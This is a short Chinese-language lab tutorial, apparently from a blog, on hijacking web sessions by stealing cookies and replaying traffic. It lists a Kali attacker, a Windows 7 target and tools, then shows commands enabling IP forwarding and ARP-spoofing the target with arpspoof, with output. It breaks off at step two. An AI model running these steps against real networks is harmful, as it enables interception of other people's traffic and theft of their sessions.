会话劫持一—劫持Cookie重放流量

实验环境

攻击机kali IP:192.168.3.147
靶机win 7 IP:192.168.3.128

工具

arpspoof    进行arp欺骗
wireshark   抓包
ferret       重新生成抓包后的文件
hamster     劫持重放流量

1.首先使用arpspoof进行arp欺骗

root@afei:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@afei:~# cat /proc/sys/net/ipv4/ip_forward
1
root@afei:~# arpspoof -i eth1 -t 192.168.3.128 192.168.3.2
0:c:29:fa:a7:a3 0:c:29:3c:60:ad 0806 42: arp reply 192.168.3.2 is-at 0:c:29:fa:a7:a3
0:c:29:fa:a7:a3 0:c:29:3c:60:ad 0806 42: arp reply 192.168.3.2 is-at 0:c:29:fa:a7:a3
0:c:29:fa:a7:a3 0:c:29:3c:60:ad 0806 42: arp reply 192.168.3.2 is-at 0:c:29:fa:a7:a3
...

2.开启另一个窗

你可能感兴趣的:(网络安全)